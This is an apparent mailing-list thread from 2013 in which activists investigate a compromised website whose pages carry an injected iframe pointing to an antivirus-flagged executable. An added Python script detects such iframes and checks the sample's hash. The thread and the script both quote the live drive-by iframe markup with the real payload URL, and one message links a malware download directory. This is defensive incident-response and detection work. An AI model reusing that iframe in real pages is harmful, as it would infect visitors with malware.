Hi! I sent the malware to a couple of friends that have a setup ready. If you want to try this, it might be fun: http://docs.cuckoosandbox.org/en/latest/

All the best,
SiNA

KheOps:
> Hey,
>
> On 29/01/2013 23:34, SiNA Rabbani wrote:
>> This is the malware:
>>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
>
> Yes, saw that too.
>
> However, I don't find any precise description of its behaviour. Like,
> what it does, if it opens any port, sends data to a C&C or whatever.
>
> I have downloaded it there:
> https://resources.telecomix.ceops.eu/material/malwares/
>
> All the best,
>
>> --SiNA
>>
>> SiNA Rabbani:
>>> holy shit:
>>>
>>> <iframe name="I1" width="10" height="10"
>>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>>> border="0" frameborder="0">
>>>
>>> :/ if you are running windows don't even go there!!!
>>>
>>> Andrew Lewis:
>>>> I can get to this in 6 hours or so, maybe someone is willing to
>>>> jump on this before then?
>>>>
>>>> -Andrew
>>>>
>>>> On Jan 30, 2013, at 11:06 AM, KheOps <[email protected]> wrote:
>>>>
>>>>> Dear Libtech,
>>>>>
>>>>> We just saw that the website http://www.syrian-martyrs.com
>>>>> is probably compromised. Every page of the website contains an
>>>>> iFrame which links to a .exe file which is detected as a virus
>>>>> by antivirus software:
>>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>>
>>>>> The fact that the HTML code is present at the bottom of each page makes
>>>>> me think that the "index.php" page has been changed in a way
>>>>> that makes that iFrame appear on every page of the website,
>>>>> after the dynamic content.
>>>>>
>>>>> It also probably means that the attackers have some kind of
>>>>> access to the server. My guess would be going to a PHP shell,
>>>>> but I'm no expert in this.
>>>>>
>>>>> Any help, clue, investigation, would be very welcome :)
>>>>>
>>>>> Thank you,
>>>>> KheOps
>>>>>
>>>>> --
>>>>> Unsubscribe, change to digest, or change password at:
>>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech

--
“Be the change you want to see in the world.” Gandhi
OTR: [email protected] a5dae15f45a37e9768f6deae7b54807fc4942ec9
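A triage script for the injection KheOps describes, added here as an example and not code from the thread, from Telecomix or from the Liberationtech list. It parses each page, flags iframes that point at an executable, are sized to be invisible, or are hidden by CSS, and records whether the frame sits after </body>, which is what you would expect from markup appended to every page by a modified index.php. The sample pages are constructed; the injected iframe is the markup SiNA posted, and the SHA-256 is the one in the VirusTotal link.

```python
"""Triage for the injected iframe described in the thread (added example).

Scans HTML pages for <iframe> tags that look like drive-by loaders rather
than content, and notes whether each one appears after </body>.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# SHA-256 taken from the VirusTotal link in the thread.
KNOWN_SAMPLE_SHA256 = "cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd"
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".bat", ".msi", ".jar")


class IframeCollector(HTMLParser):
    """Collect every <iframe> with its attributes and whether it appeared
    after </body>, i.e. past the document proper."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.after_body = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            attrs = {k.lower(): (v or "") for k, v in attrs}
            self.iframes.append((attrs, self.after_body))

    def handle_endtag(self, tag):
        if tag.lower() == "body":
            self.after_body = True


def _pixels(attrs, name):
    """Parse a width/height attribute such as '10' or '10px'; None if absent or odd."""
    raw = attrs.get(name, "").strip().lower()
    if raw.endswith("px"):
        raw = raw[:-2]
    return int(raw) if raw.isdigit() else None


def suspicious_iframes(html, max_dim=20):
    """Return findings for iframes that look like loaders, not embedded content."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs, after_body in parser.iframes:
        src = attrs.get("src", "")
        reasons = []
        if urlparse(src).path.lower().endswith(EXECUTABLE_SUFFIXES):
            reasons.append("src points at an executable")
        w, h = _pixels(attrs, "width"), _pixels(attrs, "height")
        if w is not None and h is not None and w <= max_dim and h <= max_dim:
            reasons.append(f"tiny frame {w}x{h}")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if reasons:
            findings.append({"src": src, "reasons": reasons, "after_body": after_body})
    return findings


def scan_site(pages, max_dim=20):
    """pages: {path: html}. Returns {path: findings} for pages that have findings."""
    report = {}
    for path, html in pages.items():
        found = suspicious_iframes(html, max_dim)
        if found:
            report[path] = found
    return report


def matches_known_sample(data):
    """True if a downloaded payload is the sample referenced in the thread."""
    return hashlib.sha256(data).hexdigest() == KNOWN_SAMPLE_SHA256


# Constructed sample pages (hypothetical paths). The injected iframe is the
# markup SiNA posted; the "about" page also carries a legitimate embed.
INJECTED = ('<iframe name="I1" width="10" height="10" '
            'src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe" '
            'border="0" frameborder="0"></iframe>')
SAMPLE_SITE = {
    "/index.php": "<html><body><h1>Home</h1></body></html>\n" + INJECTED,
    "/about.php": ('<html><body><p>About</p>'
                   '<iframe src="https://example.org/embed/clip" width="560" height="315"></iframe>'
                   '</body></html>\n' + INJECTED),
    "/contact.php": "<html><body><p>Contact</p></body></html>\n",
}

if __name__ == "__main__":
    for path, findings in scan_site(SAMPLE_SITE).items():
        for f in findings:
            print(f"{path}: {f['src']} ({', '.join(f['reasons'])}; "
                  f"after </body>: {f['after_body']})")
```

On a real site you would feed it the fetched pages instead of the constructed dict. If every hit reports after_body as True, that supports KheOps's reading that the markup is appended by shared PHP rather than edited into each page, so the footer include, index.php and recently modified files under the webroot are the first things to diff against a clean copy. Run the hash check on anything the server or the iframe hands you before passing it to a sandbox such as Cuckoo.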
